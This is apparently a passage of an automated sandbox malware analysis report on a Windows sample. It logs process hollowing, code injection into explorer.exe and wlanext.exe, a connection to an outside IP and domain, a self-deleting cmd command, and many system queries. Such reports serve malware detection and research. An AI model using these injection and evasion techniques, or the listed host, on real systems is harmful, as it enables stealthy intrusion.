Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CF716 mov eax, dword ptr fs:[00000030h]	10_2_019CF716
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DA70E mov eax, dword ptr fs:[00000030h]	10_2_019DA70E
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DA70E mov eax, dword ptr fs:[00000030h]	10_2_019DA70E
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A7070D mov eax, dword ptr fs:[00000030h]	10_2_01A7070D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A7070D mov eax, dword ptr fs:[00000030h]	10_2_01A7070D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DE730 mov eax, dword ptr fs:[00000030h]	10_2_019DE730
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3FF10 mov eax, dword ptr fs:[00000030h]	10_2_01A3FF10
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3FF10 mov eax, dword ptr fs:[00000030h]	10_2_01A3FF10
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A4F2E mov eax, dword ptr fs:[00000030h]	10_2_019A4F2E
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A4F2E mov eax, dword ptr fs:[00000030h]	10_2_019A4F2E
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A6131B mov eax, dword ptr fs:[00000030h]	10_2_01A6131B
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AF358 mov eax, dword ptr fs:[00000030h]	10_2_019AF358
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A78F6A mov eax, dword ptr fs:[00000030h]	10_2_01A78F6A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019ADB40 mov eax, dword ptr fs:[00000030h]	10_2_019ADB40
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BEF40 mov eax, dword ptr fs:[00000030h]	10_2_019BEF40
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D3B7A mov eax, dword ptr fs:[00000030h]	10_2_019D3B7A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D3B7A mov eax, dword ptr fs:[00000030h]	10_2_019D3B7A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019ADB60 mov ecx, dword ptr fs:[00000030h]	10_2_019ADB60
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BFF60 mov eax, dword ptr fs:[00000030h]	10_2_019BFF60
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A78B58 mov eax, dword ptr fs:[00000030h]	10_2_01A78B58
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A70EA5 mov eax, dword ptr fs:[00000030h]	10_2_01A70EA5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A70EA5 mov eax, dword ptr fs:[00000030h]	10_2_01A70EA5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A70EA5 mov eax, dword ptr fs:[00000030h]	10_2_01A70EA5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A246A7 mov eax, dword ptr fs:[00000030h]	10_2_01A246A7
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DD294 mov eax, dword ptr fs:[00000030h]	10_2_019DD294
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DD294 mov eax, dword ptr fs:[00000030h]	10_2_019DD294
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3FE87 mov eax, dword ptr fs:[00000030h]	10_2_01A3FE87
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BAAB0 mov eax, dword ptr fs:[00000030h]	10_2_019BAAB0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BAAB0 mov eax, dword ptr fs:[00000030h]	10_2_019BAAB0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DFAB0 mov eax, dword ptr fs:[00000030h]	10_2_019DFAB0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]	10_2_019A52A5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]	10_2_019A52A5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]	10_2_019A52A5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]	10_2_019A52A5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]	10_2_019A52A5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D36CC mov eax, dword ptr fs:[00000030h]	10_2_019D36CC
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2ACB mov eax, dword ptr fs:[00000030h]	10_2_019D2ACB
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E8EC7 mov eax, dword ptr fs:[00000030h]	10_2_019E8EC7
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A5FEC0 mov eax, dword ptr fs:[00000030h]	10_2_01A5FEC0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A78ED6 mov eax, dword ptr fs:[00000030h]	10_2_01A78ED6
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B76E2 mov eax, dword ptr fs:[00000030h]	10_2_019B76E2
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2AE4 mov eax, dword ptr fs:[00000030h]	10_2_019D2AE4
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D16E0 mov ecx, dword ptr fs:[00000030h]	10_2_019D16E0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C3A1C mov eax, dword ptr fs:[00000030h]	10_2_019C3A1C
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DA61C mov eax, dword ptr fs:[00000030h]	10_2_019DA61C
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DA61C mov eax, dword ptr fs:[00000030h]	10_2_019DA61C
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A5210 mov eax, dword ptr fs:[00000030h]	10_2_019A5210
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A5210 mov ecx, dword ptr fs:[00000030h]	10_2_019A5210
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A5210 mov eax, dword ptr fs:[00000030h]	10_2_019A5210
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A5210 mov eax, dword ptr fs:[00000030h]	10_2_019A5210
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AAA16 mov eax, dword ptr fs:[00000030h]	10_2_019AAA16
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AAA16 mov eax, dword ptr fs:[00000030h]	10_2_019AAA16
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B8A0A mov eax, dword ptr fs:[00000030h]	10_2_019B8A0A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A5FE3F mov eax, dword ptr fs:[00000030h]	10_2_01A5FE3F
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AC600 mov eax, dword ptr fs:[00000030h]	10_2_019AC600
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AC600 mov eax, dword ptr fs:[00000030h]	10_2_019AC600
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AC600 mov eax, dword ptr fs:[00000030h]	10_2_019AC600
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D8E00 mov eax, dword ptr fs:[00000030h]	10_2_019D8E00
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E4A2C mov eax, dword ptr fs:[00000030h]	10_2_019E4A2C
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E4A2C mov eax, dword ptr fs:[00000030h]	10_2_019E4A2C
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AE620 mov eax, dword ptr fs:[00000030h]	10_2_019AE620
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A5B260 mov eax, dword ptr fs:[00000030h]	10_2_01A5B260
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A5B260 mov eax, dword ptr fs:[00000030h]	10_2_01A5B260
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A78A62 mov eax, dword ptr fs:[00000030h]	10_2_01A78A62
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A9240 mov eax, dword ptr fs:[00000030h]	10_2_019A9240
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A9240 mov eax, dword ptr fs:[00000030h]	10_2_019A9240
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A9240 mov eax, dword ptr fs:[00000030h]	10_2_019A9240
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A9240 mov eax, dword ptr fs:[00000030h]	10_2_019A9240
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]	10_2_019B7E41
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]	10_2_019B7E41
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]	10_2_019B7E41
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]	10_2_019B7E41
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]	10_2_019B7E41
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]	10_2_019B7E41
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E927A mov eax, dword ptr fs:[00000030h]	10_2_019E927A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]	10_2_019CAE73
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]	10_2_019CAE73
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]	10_2_019CAE73
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]	10_2_019CAE73
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]	10_2_019CAE73
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A34257 mov eax, dword ptr fs:[00000030h]	10_2_01A34257
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B766D mov eax, dword ptr fs:[00000030h]	10_2_019B766D

Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 5.79.68.101 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.driplockerstore.com

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Memory written: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3440			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 2B0000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Memory written: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Memory written: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Memory written: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe base: 1189008	Jump to behavior

Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe'			Jump to behavior

Source: explorer.exe, 0000000E.00000000.467119162.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000014.00000002.599758383.0000000004210000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.467119162.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000014.00000002.599758383.0000000004210000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.467119162.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000014.00000002.599758383.0000000004210000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 0000000E.00000000.467119162.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000014.00000002.599758383.0000000004210000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Users\user\Desktop\9thuIDnsFV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
